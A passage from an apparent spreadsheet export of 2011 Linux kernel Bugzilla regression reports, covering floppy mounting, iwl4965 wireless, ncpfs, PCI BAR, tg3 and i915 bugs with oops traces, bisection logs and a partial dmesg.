(next=ffff88013f435cb0). Expected results: No memory corruption should be triggered. If left unattended, this corruption will eventually crash userspace (at least in my case, it crashed Xorg after repeated attempts to copy files to a flakey USB stick).</t>
  </si>
  <si>
    <t>Attempt to mount floppy fails with mount: /dev/fd0 is not a valid block device</t>
  </si>
  <si>
    <t>2011-05-25 15:30 UTC</t>
  </si>
  <si>
    <t>2011-06-07 08:02 UTC</t>
  </si>
  <si>
    <t>Up to and including 2.6.39-rc7, the root user can mount a floppy in a standard PC floppy drive by issuing "mount /dev/fd0 /mnt/floppy". An ordinary user cannot do this (even with a fstab mount entry) due to bug #28522. Starting with 2.6.39, if root tries to do the same operation, this is the output: [root@karlalex ~]# mount /dev/fd0 /mnt/floppy/ mount: /dev/fd0 is not a valid block device No I/O is ever attempted on the floppy drive. To reproduce: 1) Boot 2.6.39 in x86_64 machine with a standard floppy drive (not USB, not parport) and no floppy inserted in the drive. 2) After boot finishes, insert floppy in drive 3) Attempt (as root) to mount the floppy. Actual results: mount: /dev/fd0 is not a valid block device No I/O attempted on drive. Expected results: Mount should be successful, or at least I/O should be attempted on the drive. Any attempt to access /dev/fd0 (such as dd) is affected in the same way. A strace on mount shows that the open() operation on /dev/fd0 fails with ENXIO, as well as the actual mount() operation. Bisection on this bug points to the following commit: commit 9fd097b14918875bd6f125ed699d7bbbba5893ee Author: Tejun Heo &lt;tj@kernel.org&gt; Date: Thu Apr 21 21:32:55 2011 +0200 block: unexport DISK_EVENT_MEDIA_CHANGE for legacy/fringe drivers In-kernel disk event polling doesn't matter for legacy/fringe drivers and may lead to infinite event loop if -&gt;check_events() implementation generates events on level condition instead of edge. Now that block layer supports suppressing exporting unlisted events, simply leaving disk-&gt;events cleared allows these drivers to keep the internal revalidation behavior intact while avoiding weird interactions with userland event handler. Signed-off-by: Tejun Heo &lt;tj@kernel.org&gt; Cc: Kay Sievers &lt;kay.sievers@vrfy.org&gt; Signed-off-by: Jens Axboe &lt;jaxboe@fusionio.com&gt; Reverting this particular commit fixes the bug for me.</t>
  </si>
  <si>
    <t>iwlegacy - iwl4965 &amp; 5GHZ Wireless N AP</t>
  </si>
  <si>
    <t>2011-05-26 03:07 UTC</t>
  </si>
  <si>
    <t>Greg</t>
  </si>
  <si>
    <t>2011-06-09 09:07 UTC</t>
  </si>
  <si>
    <t>Created attachment 59472 [details] dmesg Since the driver moved to the iwlegacy folder, I've had problems. It works fine with 2.6.38. Symptoms... it won't find the AP and associate with it until I've run iwlist scanning a number of times. If I wait, it sometimes eventually connects. I think this is because the gnome network manager is scanning in the background... after the laptop boots, i log in and the network manager shows the 2.4GHZ APs that are in the area, but doesn't show my 5GHZ N AP.</t>
  </si>
  <si>
    <t>Kernel crash after trying to access a mountes Novell npfs volume</t>
  </si>
  <si>
    <t>2011-05-26 09:52 UTC</t>
  </si>
  <si>
    <t>fernando.arconada</t>
  </si>
  <si>
    <t>2012-02-22 08:09 UTC</t>
  </si>
  <si>
    <t>Jonathan Nieder</t>
  </si>
  <si>
    <t>After mounting a Netware 6.0SP5 volume and trying to read from the from the folder the system crash and I have to reboot using the power button Linux nemesis 2.6.38.6-27.fc15.i686.PAE #1 SMP Sun May 15 17:39:47 UTC 2011 i686 i686 i386 GNU/Linux Fedora Core 15 May 26 11:27:49 nemesis kernel: [ 5148.973666] ------------[ cut here ]------------ May 26 11:27:49 nemesis kernel: [ 5148.974245] kernel BUG at fs/dcache.c:2134! May 26 11:27:49 nemesis kernel: [ 5148.974599] invalid opcode: 0000 [#1] SMP May 26 11:27:49 nemesis kernel: [ 5148.974599] last sysfs file: /sys/devices/pci0000:00/0000:00:1e.0/0000:07:04.0/irq May 26 11:27:49 nemesis kernel: [ 5148.974599] Modules linked in: nls_utf8 ncpfs fuse cpufreq_ondemand acpi_cpufreq mperf smsc47b397 coretemp snd_hda_codec_hdmi snd_hda_intel snd_hda_codec snd_hwdep snd_seq snd_seq_device snd_pcm ppdev snd_timer snd parport_pc soundcore snd_page_alloc iTCO_wdt serio_raw hp_wmi parport e1000 sparse_keymap iTCO_vendor_support e1000e r8169 microcode rfkill mii tpm_infineon wmi virtio_net kvm ipv6 pata_acpi ata_generic nouveau ttm drm_kms_helper drm i2c_algo_bit i2c_core video [last unloaded: scsi_wait_scan] May 26 11:27:49 nemesis kernel: [ 5148.974599] May 26 11:27:49 nemesis kernel: [ 5148.974599] Pid: 12310, comm: bash Tainted: G I 2.6.38.6-27.fc15.i686.PAE #1 Hewlett-Packard HP Compaq dc7800 Convertible Minitower/0AACh May 26 11:27:49 nemesis kernel: [ 5148.974599] EIP: 0060:[&lt;c04fc31e&gt;] EFLAGS: 00010246 CPU: 1 May 26 11:27:49 nemesis kernel: [ 5148.974599] EIP is at dentry_update_name_case+0x18/0x47 May 26 11:27:49 nemesis kernel: [ 5148.974599] EAX: 00000000 EBX: e1d0b200 ECX: ffffffff EDX: e2569bec May 26 11:27:49 nemesis kernel: [ 5148.974599] ESI: e1d0b200 EDI: e2569bec EBP: e2569b68 ESP: e2569b5c May 26 11:27:49 nemesis kernel: [ 5148.974599] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 May 26 11:27:49 nemesis kernel: [ 5148.974599] Process bash (pid: 12310, ti=e2568000 task=e5df1920 task.ti=e2568000) May 26 11:27:49 nemesis kernel: [ 5148.974599] Stack: May 26 11:27:49 nemesis kernel: [ 5148.974599] e2569f30 e1d0b200 00000530 e2569d08 f7e31baa e2569d79 00000003 00000000 May 26 11:27:49 nemesis kernel: [ 5148.974599] f1e871c4 e5e9d180 ed50713c c04f9f38 e2569f90 e2569b9c 00000002 00000001 May 26 11:27:49 nemesis kernel: [ 5148.974599] 00000000 ff327000 00000004 e553ea80 00000000 e2569d2c e1ed2038 e1ecd780 May 26 11:27:49 nemesis kernel: [ 5148.974599] Call Trace: May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;f7e31baa&gt;] ncp_fill_cache+0x1ca/0x49c [ncpfs] May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c04f9f38&gt;] ? filldir64+0x0/0xcc May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c0469b90&gt;] ? arch_local_irq_save+0x12/0x17 May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c07e8fb6&gt;] ? _raw_spin_lock_irqsave+0x10/0x27 May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c04e0f4e&gt;] ? kfree+0xab/0xb3 May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;f7e370fe&gt;] ? ncp_req_put+0x18/0x1a [ncpfs] May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c07e8ffb&gt;] ? _raw_spin_unlock_irqrestore+0x13/0x15 May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;f7e377e7&gt;] ? ncp_do_request+0x2ae/0x2b8 [ncpfs] May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c045901d&gt;] ? autoremove_wake_function+0x0/0x39 May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;f7e3800d&gt;] ? ncp_request2+0x4e/0x7c [ncpfs] May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;f7e3814a&gt;] ? ncp_unlock_server+0x34/0x36 [ncpfs] May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;f7e362b7&gt;] ? ncp_update_known_namespace+0xa5/0xc7 [ncpfs] May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;f7e31f41&gt;] ncp_read_volume_list+0xc5/0xf2 [ncpfs] May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c04f9f38&gt;] ? filldir64+0x0/0xcc May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c04c8200&gt;] ? sys_remap_file_pages+0x328/0x368 May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;f7e32c42&gt;] ncp_readdir+0x48f/0x50c [ncpfs] May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c04cbf7f&gt;] ? handle_mm_fault+0x1cd/0x1d9 May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c04f9f38&gt;] ? filldir64+0x0/0xcc May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c04fa20f&gt;] vfs_readdir+0x6a/0x8f May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c04f9f38&gt;] ? filldir64+0x0/0xcc May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c04fa398&gt;] sys_getdents64+0x66/0xa6 May 26 11:27:49 nemesis kernel: [ 5148.974599] [&lt;c040969f&gt;] sysenter_do_call+0x12/0x28 May 26 11:27:49 nemesis kernel: [ 5148.974599] Code: 8d 47 68 3b 45 f0 75 ce fe 46 4c 31 c0 5e 5b 5e 5f 5d c3 55 89 e5 57 56 53 3e 8d 74 26 00 89 c3 8b 40 20 89 d7 8b 40 1c 48 75 02 &lt;0f&gt; 0b 8b 42 04 39 43 18 74 02 0f 0b 8d 43 4c e8 65 cc 2e 00 ff May 26 11:27:49 nemesis kernel: [ 5148.974599] EIP: [&lt;c04fc31e&gt;] dentry_update_name_case+0x18/0x47 SS:ESP 0068:e2569b5c May 26 11:27:49 nemesis kernel: [ 5149.022586] ---[ end trace a7919e7f17c0a727 ]--</t>
  </si>
  <si>
    <t>iwl4965 connection problems after moving to iwlegacy</t>
  </si>
  <si>
    <t>2.6.38-rc1-git</t>
  </si>
  <si>
    <t>2011-05-26 17:01 UTC</t>
  </si>
  <si>
    <t>Luca Mattiello</t>
  </si>
  <si>
    <t>2011-06-07 08:05 UTC</t>
  </si>
  <si>
    <t>I recently installed the Linux kernel version 2.6.39 just to discover that wireless networking is not functioning properly: it takes minutes to connect to the network (both in 802.11g and 802.11n mode), and often it doesn't even connect in the end; if it connects, the bit rate stays fixed ad 1Mb/s, connection speed doesn't exceed 30KiB/s, and after some minutes it disconnects again. iwconfig reports a link quality around 30/70, however at the same position and with the same link quality I am able to connect and surf full speed with both an old “good” kernel and Windows. I bisected the problem down to commit be663ab67077fac8e23eb8e231a8c1c94cb32e54 (iwlwifi: split the drivers for agn and legacy devices 3945/4965) I suspect the problem might be in one of drivers/net/wireless/iwlegacy/*-tx.c, since I noticed that iwconfig reports high “Tx excessive retries” in the affected kernels, however I'm not able to dig further into it since I'm not experienced in kernel code. Some more info (from the last “good” kernel): localhost ~ # uname -a Linux localhost 2.6.38-rc1-bsct-00448-g4bc85c1 #17 SMP Thu May 26 18:03:26 CEST 2011 x86_64 Intel(R) Core(TM)2 Duo CPU T9300 @ 2.50GHz GenuineIntel GNU/Linux localhost ~ # lspci | grep -i wireless 02:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] Network Connection (rev 61) localhost linux-2.6-bsct # git bisect log git bisect start # good: [e40152ee1e1c7a63f4777791863215e3faa37a86] Linus 2.6.34 git bisect good e40152ee1e1c7a63f4777791863215e3faa37a86 # bad: [61c4f2c81c61f73549928dfd9f3e8f26aa36a8cf] Linux 2.6.39 git bisect bad 61c4f2c81c61f73549928dfd9f3e8f26aa36a8cf # good: [520045db940a381d2bee1c1b2179f7921b40fb10] Merge branches 'upstream/xenfs' and 'upstream/core' of git://git.kernel.org/pub/scm/linux/kernel/git/jeremy/xen git bisect good 520045db940a381d2bee1c1b2179f7921b40fb10 # good: [fc8fe1e992ae0326a88edbe4d6793e840bbdd4ff] PCI / ACPI: Fix build of the AER driver for CONFIG_ACPI unset git bisect good fc8fe1e992ae0326a88edbe4d6793e840bbdd4ff # skip: [399a40c92d744feebf89b1f07208407c26e0aaf5] KVM: emulator: Fix permission checking in io permission bitmap git bisect skip 399a40c92d744feebf89b1f07208407c26e0aaf5 # good: [c370e594efe2993620d24d41a78f325102e99d1c] ARM: PL08x: fix locking between prepare function and submit function git bisect good c370e594efe2993620d24d41a78f325102e99d1c # bad: [776e58ea3d3735f85678155398241d2513afa67a] KVM: unbreak userspace that does not sets tss address git bisect bad 776e58ea3d3735f85678155398241d2513afa67a # good: [79d8a8f736151b12129984b1250fd708440e742c] Merge branch 'for-2.6.39' of git://git.kernel.org/pub/scm/linux/kernel/git/tj/percpu git bisect good 79d8a8f736151b12129984b1250fd708440e742c # good: [6445ced8670f37cfc2c5e24a9de9b413dbfc788d] Merge branch 'staging-next' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/staging-2.6 git bisect good 6445ced8670f37cfc2c5e24a9de9b413dbfc788d # good: [1b0db64fb7693c1a131b7bcc38f7bc63fb396850] Merge branch 'for-davem' of git://git.kernel.org/pub/scm/linux/kernel/git/linville/wireless-next-2.6 git bisect good 1b0db64fb7693c1a131b7bcc38f7bc63fb396850 # bad: [08704bcbf022786532b5f188935ab6619906049f] net: Create union flowi_uli git bisect bad 08704bcbf022786532b5f188935ab6619906049f # bad: [3c0afdca44af795dd315c20cc525927a459abe30] ipv4: Get peer more cheaply in rt_init_metrics(). git bisect bad 3c0afdca44af795dd315c20cc525927a459abe30 # good: [29546a6404e3a4b5d13f0a9586eb5cf1c3b25167] ipv6: Use ERR_CAST in addrconf_dst_alloc. git bisect good 29546a6404e3a4b5d13f0a9586eb5cf1c3b25167 # bad: [892c05c093858086d808aeb366b2e11106dd96c6] rtlwifi: Let rtlwifi build when PCI is not enabled git bisect bad 892c05c093858086d808aeb366b2e11106dd96c6 # bad: [36bcce430657e6fece0e8dd91557f35dbb69ec67] ath9k_htc: Handle storage devices git bisect bad 36bcce430657e6fece0e8dd91557f35dbb69ec67 # good: [409622ecc2a3b618b31b1894ed6360fbdca95d62] wl12xx: AP mode - fix bug in cleanup of wl1271_op_sta_add() git bisect good 409622ecc2a3b618b31b1894ed6360fbdca95d62 # bad: [9077f2189e54215a690048ab14ad6f7d8b5a5af7] Merge branch 'wireless-next-2.6' of git://git.kernel.org/pub/scm/linux/kernel/git/iwlwifi/iwlwifi-2.6 git bisect bad 9077f2189e54215a690048ab14ad6f7d8b5a5af7 # good: [73b78a22720087d2d384bdd49e9c25500ba73edd] iwlwifi: enable 2-wire bt coex support for non-combo device git bisect good 73b78a22720087d2d384bdd49e9c25500ba73edd # good: [4bc85c1324aaa4a8bb0171e332ff762b6230bdfe] Revert "iwlwifi: split the drivers for agn and legacy devices 3945/4965" git bisect good 4bc85c1324aaa4a8bb0171e332ff762b6230bdfe # bad: [be663ab67077fac8e23eb8e231a8c1c94cb32e54] iwlwifi: split the drivers for agn and legacy devices 3945/4965 git bisect bad be663ab67077fac8e23eb8e231a8c1c94cb32e54 Let me know if I can do something else, or provide more info. Luca Mattiello</t>
  </si>
  <si>
    <t>BAR1 not assigned</t>
  </si>
  <si>
    <t>2011-05-26 19:58 UTC</t>
  </si>
  <si>
    <t>The following device worked with 2.6.27, but doesn't work with 2.6.35: 05:01.0 Unassigned class [ff00]: Eagle Technology PCI-703 Analog I/O Card (rev 5c) Flags: bus master, slow devsel, latency 32, IRQ 22 Memory at 93b00000 (type 3, prefetchable) [size=2K] Memory at &lt;unassigned&gt; (type 3, prefetchable) 2.6.27: dmesg: PCI: 0000:05:01.0 reg 10 32bit mmio: [0, 7ff] PCI: 0000:05:01.0 reg 14 32bit mmio: [0, 7ff] /proc/iomem: 93500000-935007ff : 0000:05:01.0 93500000-935007ff : pci703drv 93500800-93500fff : 0000:05:01.0 93500800-93500fff : pci703drv 2.6.35: dmesg: pci 0000:05:01.0: BAR 0: assigned [mem 0x93b00000-0x93b007ff 64bit pref] /data/projects/eagle/edrelib/edrelib-2.6.7/drivers/edredaq/pci703/pci703.c - dev_alloc - pci703drv: BAR0 OK ([mem 0x93b00000-0x93b007ff 64bit pref]) /data/projects/eagle/edrelib/edrelib-2.6.7/drivers/edredaq/pci703/pci703.c - dev_alloc - pci703drv: Memory address for card detected at BAR1 (0xe) /data/projects/eagle/edrelib/edrelib-2.6.7/drivers/edredaq/pci703/pci703.c - dev_alloc - pci703drv: No memory address for card detected at BAR1 ([??? 0x00000000 flags 0x0]) /data/projects/eagle/edrelib/edrelib-2.6.7/drivers/edredaq/pci703/pci703.c - dev_probe - pci703drv: Failed to setup device. Note that the device has an invalid type (3) for the memory BARs. In 2.6.27, we treated them as two 32-bit BARs, but in 2.6.35, we treat it as one 64-bit BAR. Complete dmesg logs are in the LKML thread (see URL above).</t>
  </si>
  <si>
    <t>Regression: oops when using a bridge interface with tg3</t>
  </si>
  <si>
    <t>2011-05-27 15:28 UTC</t>
  </si>
  <si>
    <t>2011-05-30 08:22 UTC</t>
  </si>
  <si>
    <t>Created attachment 59712 [details] backtrace image Using a bridge interface with - eth0 from a Tigeon3 card (Broadcom Corporation NetXtreme BCM5704 Gigabit Ethernet [14e4:1648] (rev 10)) - 3 veth interfaces from LXC results in a kernel oops on 2.6.39. Up and until 2.6.38.7 I did not run into the issue. Unfortunately I'm only able to provide a screenshot or a part of the backtrace as I don't have a proper serial console available.</t>
  </si>
  <si>
    <t>Latest kernel fails to build multi-threaded on ecryptfs home</t>
  </si>
  <si>
    <t>2011-05-27 18:20 UTC</t>
  </si>
  <si>
    <t>Subject : Latest kernel fails to build multi-threaded on ecryptfs home Submitter : David &lt;david@unsolicited.net&gt; Date : 2011-05-18 Message-ID : 4DD41613.4040102@unsolicited.net References : http://marc.info/?l=linux-kernel&amp;m=130574493132641&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>System hang during X startup (non-kms, regression, bisected)</t>
  </si>
  <si>
    <t>2011-05-28 10:29 UTC</t>
  </si>
  <si>
    <t>Kirill Smelkov</t>
  </si>
  <si>
    <t>2011-08-25 17:00 UTC</t>
  </si>
  <si>
    <t>[ In follow-up to closed as unreproducible bug33662 ] I'm observing X freeze on startup on Debian Lenny based system after 2.6.37.* -&gt; 2.6.38.* kernel upgrade: X tries to start, monitor backlight blinks one time, and then whole system freeze - display is black, no reaction to keyboard (sysrq not working) and no network (i.e. ping from other host is not working). It used to work with 2.6.37.6 and earlier kernels without problem. CPU: Intel Atom N270 GPU: Intel Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller MB: iEi PCISA-945GSE libdrm2 2.3.1-2 mesa 7.0.3-7 xserver-xorg-core 1.4.2-10 xserver-xorg-video-intel 2.3.2-2+lenny8 Kernel built with: gcc (Debian 4.3.2-1.1) 4.3.2 After turning on netconsole, I see it BUGS at NULL pointer dereference in i915_driver_irq_handler: # normal startup here, then X is started and oops: [ 213.443542] BUG: unable to handle kernel NULL pointer dereference at 00000084 [ 213.443566] IP: [&lt;c11f7e0f&gt;] i915_driver_irq_handler+0x11f/0xa90 [ 213.443587] *pde = 00000000 [ 213.443597] Oops: 0000 [#1] PREEMPT [ 213.443608] last sysfs file: /sys/devices/virtual/dmi/id/board_asset_tag [ 213.443617] Modules linked in: [ 213.443626] [ 213.443634] Pid: 2511, comm: ecu-ns-proxy Not tainted 2.6.38.7--NAVY #25 ICP / iEi PCISA-945GSE / PCISA-945GSE(B125) [ 213.443657] EIP: 0060:[&lt;c11f7e0f&gt;] EFLAGS: 00210082 CPU: 0 [ 213.443666] EIP is at i915_driver_irq_handler+0x11f/0xa90 [ 213.443674] EAX: 00000000 EBX: 00000000 ECX: 00000000 EDX: dffee898 [ 213.443682] ESI: 00000000 EDI: deffc000 EBP: dec09fc0 ESP: dec09f3c [ 213.443690] DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 [ 213.443698] Process ecu-ns-proxy (pid: 2511, ti=dec08000 task=dec894e0 task.ti=dc592000) [ 213.443705] Stack: [ 213.443711] 00000002 c140f68a c1398264 c1410474 de458400 dec09f64 c12348af 00011000 [ 213.443750] de45c400 de458400 dec09f90 c123dc18 dec09f84 de4585bc deffc2b8 deffc01c And so then I've bisected this to commit e8616b6ced6137085e6657cc63bc2fe3900b8616 Author: Chris Wilson &lt;chris@chris-wilson.co.uk&gt; Date: Thu Jan 20 09:57:11 2011 +0000 drm/i915: Initialise ring vfuncs for old DRI paths We weren't setting up the vfunc table when initialising the old DRI ringbuffer, leading to such OOPSes as: BUG: unable to handle kernel NULL pointer dereference at (null) IP: [&lt;(null)&gt;] (null) PGD 10c441067 PUD 1185e5067 PMD 0 Oops: 0010 [#1] PREEMPT SMP last sysfs file: /sys/class/dmi/id/chassis_asset_tag CPU 3 Modules linked in: i915 drm_kms_helper drm fb fbdev i2c_algo_bit cfbcopyarea video backlight output cfbimgblt cfbfillrect autofs4 ipv6 nfs lockd fscache nfs_acl auth_rpcgss sunrpc coretemp hwmon_vid mousedev usbhid hid option usb_wwan snd_hda_codec_via asus_atk0110 atl1e usbserial snd_hda_intel snd_hda_codec firmware_class snd_hwdep snd_pcm snd_seq snd_timer snd_seq_device processor parport_pc thermal snd thermal_sys parport 8250_pnp button rng_core rtc_cmos shpchp hwmon rtc_core ehci_hcd pci_hotplug uhci_hcd soundcore tpm_tis i2c_i801 rtc_lib tpm serio_raw snd_page_alloc tpm_bios i2c_core usbcore psmouse intel_agp sg pcspkr sr_mod evdev cdrom ext3 jbd mbcache dm_mod sd_mod ata_piix libata scsi_mod unix Jan 18 15:49:29 lithui kernel: Pid: 3605, comm: Xorg Not tainted 2.6.36.2 #5 P5KPL-CM/System Product Name RIP: 0010:[&lt;0000000000000000&gt;] [&lt;(null)&gt;] (null) RSP: 0018:ffff8801150d1d40 EFLAGS: 00010202 RAX: 000000000001ffff RBX: ffff88011a011b00 RCX: 000000000001a704 RDX: ffff880118566028 RSI: ffff880118566028 RDI: ffff880117876800 RBP: ffff8801150d1d48 R08: ffff8801195fe300 R09: 00000000c0086444 R10: 0000000000000001 R11: 0000000000003206 R12: ffff880117876800 R13: ffff880118566000 R14: ffff880117876820 R15: ffff8801150d1df8 FS: 00007f1038d456e0(0000) GS:ffff880001780000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 00000001187e7000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process Xorg (pid: 3605, threadinfo ffff8801150d0000, task ffff88011b016e40) Stack: ffffffffa043b8e6 ffff8801150d1d98 ffffffffa041768b dead000000000000 &lt;0&gt; 0000000000000048 00007f1023f2a000 0000000000000044 0000000000000008 &lt;0&gt; ffff88010d26bd80 ffff880117876800 ffff8801150d1df8 ffff8801150d1ea8 Call Trace: [&lt;ffffffffa043b8e6&gt;] ? intel_ring_advance+0x16/0x20 [i915] [&lt;ffffffffa041768b&gt;] i915_irq_emit+0x15b/0x240 [i915] [&lt;ffffffffa03ea7b1&gt;] drm_ioctl+0x1f1/0x460 [drm] [&lt;ffffffffa0417530&gt;] ? i915_irq_emit+0x0/0x240 [i915] [&lt;ffffffff810dd8f1&gt;] ? do_sync_read+0xd1/0x120 [&lt;ffffffff81025b1f&gt;] ? do_page_fault+0x1df/0x3d0 [&lt;ffffffff810ed5c7&gt;] do_vfs_ioctl+0x97/0x550 [&lt;ffffffff8115c2ea&gt;] ? security_file_permission+0x7a/0x90 [&lt;ffffffff810edb19&gt;] sys_ioctl+0x99/0xa0 [&lt;ffffffff810024ab&gt;] system_call_fastpath+0x16/0x1b Code: Bad RIP value. RIP [&lt;(null)&gt;] (null) RSP &lt;ffff8801150d1d40&gt; CR2: 0000000000000000 Reported-by: Herbert Xu &lt;herbert@gondor.apana.org.au&gt; Tested-by: Herbert Xu &lt;herbert@gondor.apana.org.au&gt; Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=29153 Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=23172 Signed-off-by: Chris Wilson &lt;chris@chris-wilson.co.uk&gt; Cc: stable@kernel.org This is 100% reproducible on several iEi PCISA-945GSE motherboards. Attaching full dmesg and `X -verbose` output for the reference. Thanks beforehand, Kirill ---- 8&lt; ---- (full dmesg) navy3:~# dmesg [ 0.000000] Linux version 2.6.38.7--NAVY (kirr@tugrik) (gcc version 4.3.2 (Debian 4.3.2-1.1) ) #25 PREEMPT Sat May 28 13:39:47 MSD 2011 [ 0.000000] Atom PSE erratum detected, BIOS microcode update recommended [ 0.000000] BIOS-provided physical RAM map: [ 0.000000] BIOS-e820: 0000000000000000 - 0000000000097000 (usable) [ 0.000000] BIOS-e820: 0000000000097000 - 00000000000a0000 (reserved) [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) [ 0.000000] BIOS-e820: 0000000000100000 - 000000001f7b0000 (usable) [ 0.000000] BIOS-e820: 000000001f7b0000 - 000000001f7be000 (ACPI data) [ 0.000000] BIOS-e820: 000000001f7be000 - 000000001f7f0000 (ACPI NVS) [ 0.000000] BIOS-e820: 000000001f7f0000 - 000000001f800000 (reserved) [ 0.000000] BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) [ 0.000000] BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved) [ 0.000000] Notice: NX (Execute Disable) protection cannot be enabled: non-PAE kernel! [ 0.000000] DMI present. [ 0.000000] DMI: ICP / iEi PCISA-945GSE/PCISA-945GSE(B125), BIOS 080015 03/13/2009 [ 0.000000] e820 update range: 0000000000000000 - 0000000000010000 (usable) ==&gt; (reserved) [ 0.000000] e820 remove range: 00000000000a0000 - 0000000000100000 (usable) [ 0.000000] last_pfn = 0x1f7b0 max_arch_pfn = 0x100000 [ 0.000000] MTRR default type: uncachable [ 0.000000] MTRR fixed ranges enabled: [ 0.000000] 00000-9FFFF write-back [ 0.000000] A0000-DFFFF uncachable [ 0.000000] E0000-E3FFF write-protect [ 0.000000] E4000-E7FFF write-through [ 0.000000] E8000-FFFFF write-protect [ 0.000000] MTRR variable ranges enabled: [ 0.000000] 0 base 000000000 mask 0E0000000 write-back [ 0.000000] 1 base 01F800000 mask 0FF800000 uncachable [ 0.000000] 2 disabled [ 0.000000] 3 disabled [ 0.000000] 4 disabled [ 0.000000] 5 disabled [ 0.000000] 6 disabled [ 0.000000] 7 disabled [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106 [ 0.000000] found SMP MP-table at [c00ff780] ff780 [ 0.000000] initial memory mapped : 0 - 01c00000 [ 0.000000] init_memory_mapping: 0000000000000000-000000001f7b0000 [ 0.000000] 0000000000 - 001f7b0000 page 4k [ 0.000000] kernel direct mapping tables up to 1f7b0000 @ 1b7f000-1c00000 [ 0.000000] 503MB LOWMEM available. [ 0.000000] mapped low ram: 0 - 1f7b0000 [ 0.000000] low ram: 0 - 1f7b0000 [ 0.000000] Zone PFN ranges: [ 0.000000] DMA 0x00000010 -&gt; 0x00001000 [ 0.000000] Normal 0x00001000 -&gt; 0x0001f7b0 [ 0.000000] Movable zone start PFN for each node [ 0.000000] early_node_map[2] active PFN ranges [ 0.000000] 0: 0x00000010 -&gt; 0x00000097 [ 0.000000] 0: 0x00000100 -&gt; 0x0001f7b0 [ 0.000000] On node 0 totalpages: 128823 [ 0.000000] free_area_init_node: node 0, pgdat c149ed60, node_mem_map df3c0200 [ 0.000000] DMA zone: 32 pages used for memmap [ 0.000000] DMA zone: 0 pages reserved [ 0.000000] DMA zone: 3943 pages, LIFO batch:0 [ 0.000000] Normal zone: 976 pages used for memmap [ 0.000000] Normal zone: 123872 pages, LIFO batch:31 [ 0.000000] Using APIC driver default [ 0.000000] Intel MultiProcessor Specification v1.4 [ 0.000000] Virtual Wire compatibility mode. [ 0.000000] MPTABLE: OEM ID: Intel [ 0.000000] MPTABLE: Product ID: Calistoga [ 0.000000] MPTABLE: APIC at: 0xFEE00000 [ 0.000000] Processor #0 (Bootup-CPU) [ 0.000000] IOAPIC[0]: apic_id 1, version 32, address 0xfec00000, GSI 0-23 [ 0.000000] Processors: 1 [ 0.000000] nr_irqs_gsi: 40 [ 0.000000] Allocating PCI resources starting at 1f800000 (gap: 1f800000:df600000) [ 0.000000] pcpu-alloc: s0 r0 d32768 u32768 alloc=1*32768 [ 0.000000] pcpu-alloc: [0] 0 [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 127815 [ 0.000000] Kernel command line: root=/dev/hdb1 netconsole=5555@192.168.72.123/eth0,5556@192.168.72.255/ vga=788 nosplash panic=60 ro 5 [ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes) [ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes) [ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes) [ 0.000000] Initializing CPU#0 [ 0.000000] Memory: 504088k/515776k available (3522k kernel code, 11204k reserved, 1224k data, 324k init, 0k highmem) [ 0.000000] virtual kernel memory layout: [ 0.000000] fixmap : 0xfffa4000 - 0xfffff000 ( 364 kB) [ 0.000000] vmalloc : 0xdffb0000 - 0xfffa2000 ( 511 MB) [ 0.000000] lowmem : 0xc0000000 - 0xdf7b0000 ( 503 MB) [ 0.000000] .init : 0xc14a3000 - 0xc14f4000 ( 324 kB) [ 0.000000] .data : 0xc13709d6 - 0xc14a2cc0 (1224 kB) [ 0.000000] .text : 0xc1000000 - 0xc13709d6 (3522 kB) [ 0.000000] Checking if this processor honours the WP bit even in supervisor mode...Ok. [ 0.000000] Preemptable hierarchical RCU implementation. [ 0.000000] RCU-based detection of stalled CPUs is disabled. [ 0.000000] Verbose stalled-CPUs detection is disabled. [ 0.000000] NR_IRQS:288 [ 0.000000] CPU 0 irqstacks, hard=dec08000 soft=dec0a000 [ 0.000000] Console: colour dummy device 80x25 [ 0.000000] console [tty0] enabled [ 0.000000] Fast TSC calibration using PIT [ 0.000000] Detected 1595.858 MHz processor. [ 0.004004] Calibrating delay loop (skipped), value calculated using timer frequency.. 3191.71 BogoMIPS (lpj=6383432) [ 0.004029] 